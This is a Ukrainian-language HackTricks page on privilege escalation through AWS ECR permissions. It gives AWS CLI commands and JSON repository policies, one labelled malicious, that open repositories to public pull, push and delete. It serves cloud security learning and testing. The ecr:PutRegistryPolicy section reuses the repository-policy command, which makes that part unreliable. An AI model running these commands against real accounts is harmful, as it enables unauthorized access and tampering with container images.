AWS - ECR Privesc

Підтримайте HackTricks

ECR

ecr:GetAuthorizationToken,ecr:BatchGetImage

Атакувальник з дозволами ecr:GetAuthorizationToken та ecr:BatchGetImage може увійти до ECR та завантажити зображення.

Для отримання додаткової інформації щодо завантаження зображень:

AWS - ECR Post Exploitation

Потенційний вплив: Побічне підвищення привілеїв шляхом перехоплення чутливої інформації в трафіку.

ecr:GetAuthorizationToken, ecr:BatchCheckLayerAvailability, ecr:CompleteLayerUpload, ecr:InitiateLayerUpload, ecr:PutImage, ecr:UploadLayerPart

Атакувальник з усіма цими дозволами може увійти до ECR та завантажити зображення. Це може бути корисно для підвищення привілеїв до інших середовищ, де використовуються ці зображення.

Щоб дізнатися, як завантажити нове зображення або оновити існуюче, перевірте:

AWS - EKS Enum

ecr-public:GetAuthorizationToken, ecr-public:BatchCheckLayerAvailability, ecr-public:CompleteLayerUpload, ecr-public:InitiateLayerUpload, ecr-public:PutImage, ecr-public:UploadLayerPart

Те ж саме, що й попередній розділ, але для публічних репозиторіїв.

ecr:SetRepositoryPolicy

Атакувальник з цим дозволом може змінити політику репозиторію, щоб надати собі (або навіть усім) доступ на читання/запис. Наприклад, у цьому прикладі доступ на читання надається всім.

aws ecr set-repository-policy \
--repository-name <repo_name> \
--policy-text file://my-policy.json

Зміст my-policy.json:

{
"Version" : "2008-10-17",
"Statement" : [
{
"Sid" : "allow public pull",
"Effect" : "Allow",
"Principal" : "*",
"Action" : [
"ecr:BatchCheckLayerAvailability",
"ecr:BatchGetImage",
"ecr:GetDownloadUrlForLayer"
]
}
]
}

ecr-public:SetRepositoryPolicy

Як і попередній розділ, але для публічних репозиторіїв. Атакувальник може змінити політику репозиторію публічного ECR репозиторію, щоб надати несанкціонований публічний доступ або підвищити свої привілеї.

bashCopy code# Create a JSON file with the malicious public repository policy
echo '{
"Version": "2008-10-17",
"Statement": [
{
"Sid": "MaliciousPublicRepoPolicy",
"Effect": "Allow",
"Principal": "*",
"Action": [
"ecr-public:GetDownloadUrlForLayer",
"ecr-public:BatchGetImage",
"ecr-public:BatchCheckLayerAvailability",
"ecr-public:PutImage",
"ecr-public:InitiateLayerUpload",
"ecr-public:UploadLayerPart",
"ecr-public:CompleteLayerUpload",
"ecr-public:DeleteRepositoryPolicy"
]
}
]
}' > malicious_public_repo_policy.json

# Apply the malicious public repository policy to the ECR Public repository
aws ecr-public set-repository-policy --repository-name your-ecr-public-repo-name --policy-text file://malicious_public_repo_policy.json

Потенційний вплив: Несанкціонований публічний доступ до репозиторію ECR Public, що дозволяє будь-якому користувачеві завантажувати, витягувати або видаляти зображення.

ecr:PutRegistryPolicy

Зловмисник з цим дозволом може змінити політику реєстру, щоб надати собі, своєму обліковому запису (або навіть усім) доступ на читання/запис.

aws ecr set-repository-policy \
--repository-name <repo_name> \
--policy-text file://my-policy.json
Підтримайте HackTricks

Last updated